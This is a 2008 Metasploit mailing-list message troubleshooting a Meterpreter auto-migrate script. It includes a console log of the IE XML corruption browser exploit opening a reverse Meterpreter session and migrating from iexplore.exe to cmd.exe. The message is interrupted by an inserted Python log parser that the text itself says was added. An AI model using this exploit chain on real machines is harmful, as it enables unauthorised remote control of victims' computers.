Metasploit mailing list archives

Meterpreter script to auto-migrate


From: natron at invisibledenizen.org (natron)
Date: Sat, 13 Dec 2008 11:25:06 -0600

On Sat, Dec 13, 2008 at 10:46 AM, H D Moore <hdm at metasploit.com> wrote:
> On Saturday 13 December 2008, natron wrote:
> > I think this may be a combination of two bugs, one is known and
> > labeled in the code, but I think the other one is new.
> >
> > 1) When I run it with AutoRunScript it hangs on the
> > client.sys.process.execute call.  Is it possible that something with
> > the client object isn't set up until you do an "interact -i #"?  It
> > works almost 100% of the time for me within a session.  If that's it,
> > would it be possible to manually set up the client object somehow?
>
> A migrate in the AutoRunScript before the session is set up may break some
> of the initialization code; I opened ticket #266 to track it.

It doesn't appear to be a problem with the migrate code; it's getting
hung up on the code to execute a new process.  To double-check, I
verified the original migrate.rb script still works as an
AutoRunScript:

The migrate code appears to work; it's the call to execute a new
process that hangs up.  Using the scripts/meterpreter/migrate.rb
(modified to migrate to cmd.exe rather than lsass.exe):

msf exploit(ie_xml_corruption) > exploit
[*] Exploit running as background job.
msf exploit(ie_xml_corruption) >
[*] Handler binding to LHOST 192.168.1.112
[*] Started reverse handler
[*] Using URL: http://192.168.1.112:8080/ie-xml-corruption.html
[*] Server started.
[*] Sending HTML to 192.168.1.108:2060...
[*] Sending DLL to 192.168.1.108:2060...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Migrating to cmd.exe...
[*] Current server process: iexplore.exe (3564)
[*] New server process: cmd.exe (3848)
[*] Meterpreter session 1 opened (192.168.1.112:4444 -> 192.168.1.108:2062)
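The transcript above is the only evidence the message gives for what happened and in what order: the migration lines are printed before the "session opened" line, which is exactly the "AutoRunScript runs before the session is set up" ordering HD Moore's reply refers to. The following is an added example, not part of the original thread or of Metasploit, that parses this console output format (as shown in the message; the line layout is assumed from that transcript alone) into structured session records, so that a console log can be reviewed after the fact for which process a session ended up in and whether the migration happened before the session was reported open. The sample input is a constructed copy of the lines above.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: the relevant lines of the console transcript quoted above.
SAMPLE_TRANSCRIPT = """\
[*] Upload completed.
[*] Migrating to cmd.exe...
[*] Current server process: iexplore.exe (3564)
[*] New server process: cmd.exe (3848)
[*] Meterpreter session 1 opened (192.168.1.112:4444 -> 192.168.1.108:2062)
"""

# Line formats assumed from the transcript in the message.
PROC_RE = re.compile(r"^\[\*\] (Current|New) server process: (\S+) \((\d+)\)$")
SESSION_RE = re.compile(
    r"^\[\*\] Meterpreter session (\d+) opened \((\S+) -> (\S+)\)$"
)


@dataclass
class Migration:
    from_name: str
    from_pid: int
    to_name: str
    to_pid: int


@dataclass
class Session:
    sid: int
    handler: str   # local listener, e.g. 192.168.1.112:4444
    target: str    # remote endpoint, e.g. 192.168.1.108:2062
    # Migration seen before this session's "opened" line, if any.
    # Non-None means an AutoRunScript migrated before the session was fully set up.
    migration: Optional[Migration]


def parse_transcript(text: str) -> List[Session]:
    """Pair 'Current'/'New server process' lines into a Migration and attach
    it to the next 'session opened' line that follows it."""
    pending_current = None
    pending_migration = None
    sessions: List[Session] = []
    for line in text.splitlines():
        m = PROC_RE.match(line)
        if m:
            which, name, pid = m.groups()
            if which == "Current":
                pending_current = (name, int(pid))
            elif pending_current is not None:
                pending_migration = Migration(
                    pending_current[0], pending_current[1], name, int(pid)
                )
                pending_current = None
            continue
        m = SESSION_RE.match(line)
        if m:
            sessions.append(
                Session(int(m.group(1)), m.group(2), m.group(3), pending_migration)
            )
            pending_migration = None
    return sessions


def migrated_before_open(session: Session) -> bool:
    """True when the session record carries a migration that was logged
    before the session itself was reported open."""
    return session.migration is not None


if __name__ == "__main__":
    for s in parse_transcript(SAMPLE_TRANSCRIPT):
        print(s, "migrated before open:", migrated_before_open(s))
```

The parser attaches a migration to the first session that opens after it, which is the only association the console output supports; in a log with several concurrent handlers that association would be ambiguous, so treat the `migration` field as "the last migration printed before this session opened", not as proof of which session it belonged to.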